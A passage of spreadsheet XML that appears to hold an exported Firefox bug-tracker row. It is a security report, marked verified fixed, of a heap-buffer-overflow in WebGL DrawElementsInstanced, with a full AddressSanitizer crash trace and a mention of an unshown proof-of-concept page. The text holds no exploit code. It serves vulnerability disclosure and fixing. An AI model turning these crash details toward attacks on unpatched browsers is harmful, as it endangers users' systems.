        </is>
      </c>
      <c r="I5913" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5913" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5913" t="inlineStr">
        <is>
          <t>Firefox 115</t>
        </is>
      </c>
      <c r="L5913" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5913" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5913" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5913" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5913" t="inlineStr">
        <is>
          <t>[disclosure deadline 2023-12-19][adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q5913" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5913" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5913" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T5913" t="n">
        <v>1</v>
      </c>
      <c r="U5913" t="n">
        <v>0</v>
      </c>
      <c r="V5913" t="n">
        <v>132</v>
      </c>
      <c r="W5913" t="inlineStr">
        <is>
          <t>Created attachment 9344057
poc.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Steps to reproduce:
## **Title**
- Firefox WebGL DrawElementsInstanced Heap-Buffer-Overflow Vulnerability
## **Summary**
- A Heap-Buffer-Overflow vulnerability exists in the WebGL DrawElementsInstanced
- The browser process crashes when triggering this bug.
## **Test environment**
- Product : Firefox Stable &amp; Firefox ASan Build Opt
- VM : Virtualbox 7.0.8
- GUEST OS : Ubuntu Desktop 23.04
## ASan
```jsx
=================================================================
==11034==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6310051f36c8 at pc 0x5569d5ba3671 bp 0x7f3dd59f9880 sp 0x7f3dd59f9040
READ of size 84704 at 0x6310051f36c8 thread T36
    #0 0x5569d5ba3670 in memcpy /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:875:5
    #1 0x7f3d98459ee4  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa59ee4) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #2 0x7f3d9846a4f4  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa6a4f4) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #3 0x7f3d98445dfc  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa45dfc) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #4 0x7f3d98449fba  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa49fba) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #5 0x7f3d98446612  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa46612) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #6 0x7f3d984466cf  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa466cf) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #7 0x7f3d98446733  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa46733) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #8 0x7f3d9843a24c  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa3a24c) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #9 0x7f3d97cf20aa  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0x2f20aa) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #10 0x7f3d97cf3885  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0x2f3885) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
    #11 0x7f3dfc619bfb in raw_fDrawElements /builds/worker/checkouts/gecko/gfx/gl/GLContext.h:1076:5
    #12 0x7f3dfc619bfb in mozilla::gl::GLContext::fDrawElements(unsigned int, int, unsigned int, void const*) /builds/worker/checkouts/gecko/gfx/gl/GLContext.h:1090:5
    #13 0x7f3dfc6193ab in mozilla::WebGLContext::DrawElementsInstanced(unsigned int, int, unsigned int, long, int) /builds/worker/checkouts/gecko/dom/canvas/WebGLContextDraw.cpp:1057:15
    #14 0x7f3dfc6f17f0 in DrawElementsInstanced /builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h:755:15
    #15 0x7f3dfc6f17f0 in auto bool mozilla::MethodDispatcher&lt;mozilla::WebGLMethodDispatcher, 101ul, void (mozilla::HostWebGLContext::*)(unsigned int, int, unsigned int, long, int) const, &amp;mozilla::HostWebGLContext::DrawElementsInstanced(unsigned int, int, unsigned int, long, int) const&gt;::DispatchCommand&lt;mozilla::HostWebGLContext&gt;(mozilla::HostWebGLContext&amp;, unsigned long, mozilla::webgl::RangeConsumerView&amp;)::'lambda'(auto&amp;...)::operator()&lt;unsigned int, int, unsigned int, long, int&gt;(auto&amp;...) const /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:253:13
    #16 0x7f3dfc69c9c5 in __invoke_impl&lt;bool, (lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned int &amp;, int &amp;, unsigned int &amp;, long &amp;, int &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:60:14
    #17 0x7f3dfc69c9c5 in __invoke&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned int &amp;, int &amp;, unsigned int &amp;, long &amp;, int &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:95:14
    #18 0x7f3dfc69c9c5 in __apply_impl&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple&lt;unsigned int, int, unsigned int, long, int&gt; &amp;, 0UL, 1UL, 2UL, 3UL, 4UL&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1678:14
    #19 0x7f3dfc69c9c5 in apply&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple&lt;unsigned int, int, unsigned int, long, int&gt; &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1687:14
    #20 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:244:14
    #21 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #22 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #23 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #24 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #25 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #26 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #27 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #28 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #29 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #30 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #31 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #32 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #33 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #34 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #35 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #36 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #37 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #38 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #39 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #40 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #41 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #42 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #43 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #44 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #45 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #46 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #47 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #48 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #49 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #50 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #51 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #52 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #53 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #54 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #55 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #56 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #57 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #58 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #59 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #60 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #61 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #62 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #63 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #64 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #65 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #66 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #67 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #68 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #69 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #70 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #71 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #72 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #73 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #74 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #75 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #76 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #77 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #78 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #79 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #80 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #81 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #82 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #83 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #84 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #85 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #86 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #87 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #88 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #89 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #90 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #91 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #92 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #93 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #94 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #95 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #96 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #97 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #98 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #99 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #100 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #101 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #102 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #103 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #104 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #105 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #106 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #107 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #108 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #109 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #110 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #111 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #112 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #113 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #114 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #115 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #116 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #117 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #118 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #119 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #120 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #121 0x7f3dfc69c9c5 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #122 0x7f3dfc69c9c5 in mozilla::dom::WebGLParent::RecvDispatchCommands(mozilla::ipc::BigBuffer&amp;&amp;, unsigned long) /builds/worker/checkouts/gecko/dom/canvas/WebGLParent.cpp:62:21
    #123 0x7f3dfc7c811a in mozilla::dom::PWebGLParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PWebGLParent.cpp:229:79
    #124 0x7f3df8f9ff94 in mozilla::gfx::PCanvasManagerParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp:214:32
    #125 0x7f3df7a6141d in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1811:25
    #126 0x7f3df7a5df13 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr&lt;IPC::Message, mozilla::DefaultDelete&lt;IPC::Message&gt;&gt;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1736:9
    #127 0x7f3df7a5f02b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1536:3
    #128 0x7f3df7a60022 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1634:14
    #129 0x7f3df6048aff in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1193:16
    #130 0x7f3df6056464 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480:10
    #131 0x7f3df7a69f8a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:330:5
    #132 0x7f3df78b9a0a in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
    #133 0x7f3df78b9a0a in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
    #134 0x7f3df78b9a0a in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
    #135 0x7f3df603fb2f in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391:10
    #136 0x7f3e146b4b3f in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #137 0x7f3e1448f189 in start_thread nptl/pthread_create.c:444:8
    #138 0x7f3e1451dbcf in clone3 misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81
0x6310051f36c8 is located 0 bytes after 77512-byte region [0x6310051e0800,0x6310051f36c8)
allocated by thread T36 here:
    #0 0x5569d5c20458 in calloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:77:3
    #1 0x7f3d98469542  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xa69542) (BuildId: 60cea14709f13d122c75908469400dbfeb094a60)
Thread T36 created by T0 here:
    #0 0x5569d5c0849a in pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:208:3
    #1 0x7f3e146a32a4 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7f3e14690e9e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7f3df604382c in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:634:18
    #4 0x7f3df6053c0e in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThreadManager::ThreadCreationOptions, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:550:12
    #5 0x7f3df6061afc in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, nsIThreadManager::ThreadCreationOptions) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:176:57
    #6 0x7f3df8f5b315 in NS_NewNamedThread&lt;15UL&gt; /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:76:10
    #7 0x7f3df8f5b315 in mozilla::gfx::CanvasRenderThread::Start() /builds/worker/checkouts/gecko/gfx/ipc/CanvasRenderThread.cpp:55:17
    #8 0x7f3df8d862b0 in gfxPlatform::InitLayersIPC() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1315:9
    #9 0x7f3df8d7f290 in gfxPlatform::Init() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:974:3
    #10 0x7f3df8d85ccf in GetPlatform /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:464:5
    #11 0x7f3df8d85ccf in gfxPlatform::InitializeCMS() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:2109:9
